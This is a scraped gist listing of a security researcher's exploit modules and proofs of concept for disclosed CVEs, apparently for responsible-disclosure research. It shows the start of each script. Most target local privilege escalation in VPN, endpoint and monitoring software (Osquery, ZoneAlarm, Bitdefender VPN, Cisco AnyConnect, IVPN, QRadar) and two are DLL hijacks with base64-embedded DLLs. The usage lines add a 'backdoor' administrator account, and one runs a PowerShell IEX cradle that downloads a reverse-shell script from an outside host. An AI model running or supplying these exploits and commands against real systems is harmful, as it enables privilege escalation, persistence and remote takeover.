Yorick Koster ykoster
ykoster
/ dionaea_attach_database.py
Created
November 19, 2019 15:25
Dionaea honeypot allows the "ATTACH DATABASE" command, which can be used to attach to any local SQLite database on which the Dionaea process has read access. If Dionaea has write access, it is even possible to make changes to the database. This includes the logging database (when used) and sipaccounts database.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import MySQLdb | |
| host = '127.0.0.1' | |
| port = 3306 | |
| user = 'root' | |
| passwd = 'passwd' | |
| dbs = ['/opt/dionaea/var/lib/dionaea/dionaea.sqlite', '/opt/dionaea/var/lib/dionaea/sip/accounts.sqlite'] | |
| conn = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd) |
ykoster
/ Invoke-ExploitOsqueryLPE.psm1
Created
December 29, 2019 16:08
Exploit module for CVE-2019-3567 - Osquery for Windows access right misconfiguration Elevation of Privilege (https://offsec.almond.consulting/osquery-windows-acl-misconfiguration-eop.html)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Exploit module for CVE-2019-3567 - Osquery for Windows access right misconfiguration Elevation of Privilege | |
| .Description | |
| This modules exploits a vulnerability in Osquery < 3.4.0. | |
| It was found that Osquery is installed in %ProgramData%, which has weak file permissions. | |
| A local user can exploit this issue to run arbitrary code with SYSTEM privileges. | |
| https://offsec.almond.consulting/osquery-windows-acl-misconfiguration-eop.html |
ykoster
/ Invoke-ExploitZoneAlarmLPE.psm1
Last active
March 19, 2020 17:44
ZoneAlarm (< v15.8.043.18324) TrueVector Internet Monitor service insecure NTFS permissions vulnerability proof of concept
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| This module exploits a vulnerability in the TrueVector Internet Monitor service of CheckPoint ZoneAlarm to gain elevated privileges | |
| .Description | |
| This module exploits a vulnerability in the TrueVector Internet Monitor service, which is installed as part of CheckPoint ZoneAlarm. | |
| The affected service is running as LocalSystem, it will periodically create a number of backup files within the ProgramData folder. | |
| When these files are created, their file permissions are explicitly set to Full Control for Authenticated Users. | |
| A local attacker can create a hardlink with the same name as the backup files, causing the permissions of another file to be changed. |
ykoster
/ Invoke-ExploitBdVpnLpe.psm1
Created
January 31, 2020 22:35
Exploit module for Bitdefender VPN for Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Exploit module for Bitdefender VPN for Windows | |
| .Parameter Command | |
| Command(s) to be executed when openvpn.exe is started | |
| .Example | |
| Import-Module .\Invoke-ExploitBdVpnLpe.psm1 | |
| Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" |
ykoster
/ Invoke-ExploitAnyConnectPathTraversal.psm1
Last active
May 5, 2021 23:19
Proof of concept for CVE-2020-3153 - Cisco AnyConnect elevation of privileges due to insecure handling of path names - https://www.securify.nl/advisory/SFY20200419/cisco-anyconnect-elevation-of-privileges-due-to-insecure-handling-of-path-names.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows | |
| .Description | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows. | |
| When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll. | |
| This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen. | |
| Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges. |
ykoster
/ Invoke-ExploitIVPNLPE.psd1
Last active
March 13, 2020 06:49
IVPN <= 2.11.3 exploit module to run commands with SYSTEM privileges
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Example usage: | |
| Import-Module .\Invoke-ExploitIVPNLPE.psd1 | |
| Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" | |
| Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" | |
| Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')" | |
| #> | |
| @{ | |
| RootModule = 'Invoke-ExploitIVPNLPE.psm1' | |
| ModuleVersion = '1.0' |
ykoster
/ AsperaConnectQtDllHijack.ps1
Last active
September 10, 2020 06:53
CVE-2020-4545: IBM Aspera Connect for Windows Qt plugin hijack proof of concept
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # embedded 32-bit DLL that runs calc.exe | |
| $EncodedCompressedFile = "H4sICOaxZ14AA2RsbF94ODYuZGxsAOw7C3RTZZp/mlsaSyARU6hQJGqYKS507+2L5kVb2gooj2oLojzT9gZi27QkN7T4bE1z9O41TtyVXR8zSgfP6hzrrjgMT4+TEqDgY6zISrUeDiPgphOUIh7sipL9vv/etCkyMzvnuGfcWf7y57/3v9//vf7v9d+ERfeEiJoQwkCPxwnZReRWQv58a4M+ftqe8WT7Ne/euEu18N0bq9e7vMZmT9M6j6PRWOtwu5sEYw1v9PjcRpfbWL6kytjYVMfnjBuXblJwVFYQslCVPgrvCTL+5rGqlBvJRLjJl5lruw5GPXQWIbrq6XWKzLdK4Z+2sHxz6SQBuUrgkVFehx96GYQOzYQIihCm4cVXaK8RkjXmjz+eWUJI5hXmDwHex/8E2hyBb0X6dQaFoYnJQshtLalcm1PnEBxIBydQdpCZTB4NV0LYcI5HBnxDTeTNQ1xZ34MrydkgNPKCo86IeCoVOOPlcGtLcmq8XrzuUlNGrtjayNpwDi/TpbpsVvgzjYajdF0yHNV1G3TU6U+uIEfZndUkIW9IwTfzCnBCA+VPgx9bFLicK+mFb2iqVfbwNWUB+z24uVeW8G+/+c9k9TAmsrarPspNgNv9WZHgdrovwR34edeyKv8ZvVRuMgXCPo+UoQXIwJGH7vL/QcXF30TPE+lcbKIMD8iiYDLxDNLeVe8/w4hDg7ptBS/WwqqwGPGd6HwZLv1DKbqOT2XoaTBE//VaiDyIzL9fv2L1mn1aojAR8g+pdIGX4KquE92MuyAtZyQ7Io9lBoWfEHNE13Eoie4xpDkINKfKNH3HuX6FpkrXMR5o0LtAWNexjSg39NFBuAv06zoknM0uQRAhS6o2ZfeUmxg0LrHapIF7o2gwxXv9Z7T+VJRbBRxTzmW2Q6NvnaGEco+ChD2pSA3FepRyd5nEVH97cW7gt |
ykoster
/ OneDriveQtDllHijack.ps1
Created
March 23, 2020 08:01
Microsoft OneDrive client Qt plugin hijack proof of concept
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # kill OneDrive if it's running | |
| Get-Process -Name OneDrive -ErrorAction SilentlyContinue | Stop-Process -ErrorAction SilentlyContinue | |
| # embedded 32-bit DLL that runs calc.exe | |
| $EncodedCompressedFile = "H4sICOaxZ14AA2RsbF94ODYuZGxsAOw7C3RTZZp/mlsaSyARU6hQJGqYKS507+2L5kVb2gooj2oLojzT9gZi27QkN7T4bE1z9O41TtyVXR8zSgfP6hzrrjgMT4+TEqDgY6zISrUeDiPgphOUIh7sipL9vv/etCkyMzvnuGfcWf7y57/3v9//vf7v9d+ERfeEiJoQwkCPxwnZReRWQv58a4M+ftqe8WT7Ne/euEu18N0bq9e7vMZmT9M6j6PRWOtwu5sEYw1v9PjcRpfbWL6kytjYVMfnjBuXblJwVFYQslCVPgrvCTL+5rGqlBvJRLjJl5lruw5GPXQWIbrq6XWKzLdK4Z+2sHxz6SQBuUrgkVFehx96GYQOzYQIihCm4cVXaK8RkjXmjz+eWUJI5hXmDwHex/8E2hyBb0X6dQaFoYnJQshtLalcm1PnEBxIBydQdpCZTB4NV0LYcI5HBnxDTeTNQ1xZ34MrydkgNPKCo86IeCoVOOPlcGtLcmq8XrzuUlNGrtjayNpwDi/TpbpsVvgzjYajdF0yHNV1G3TU6U+uIEfZndUkIW9IwTfzCnBCA+VPgx9bFLicK+mFb2iqVfbwNWUB+z24uVeW8G+/+c9k9TAmsrarPspNgNv9WZHgdrovwR34edeyKv8ZvVRuMgXCPo+UoQXIwJGH7vL/QcXF30TPE+lcbKIMD8iiYDLxDNLeVe8/w4hDg7ptBS/WwqqwGPGd6HwZLv1DKbqOT2XoaTBE//VaiDyIzL9fv2L1mn1aojAR8g+pdIGX4KquE92MuyAtZyQ7Io9lBoWfEHNE13Eoie4xpD |
ykoster
/ Start-ProcessAMSelfElevate.psm1
Last active
July 18, 2025 04:43
PowerShell module to interact with the Self-Elevation functionality of Ivanti AppSense Application Manager
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| This module can be used to invoke the Self-Elevation functionality of | |
| Ivanti AppSense Application Manager | |
| .Description | |
| This module uses the AMShellIntegration.AMShellContextMenu COM component to | |
| invoke the Self-Elevation functionality of Ivanti AppSense Application | |
| Manager. |
ykoster
/ qradar_run-result-reader_lpe.sh
Created
April 16, 2020 07:43
Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| trap cleanup INT | |
| function cleanup() | |
| { | |
| if [ -f /tmp/run-result-reader.sh ] | |
| then | |
| /usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh | |
| /usr/bin/rm -f /tmp/run-result-reader.sh | |
| fi |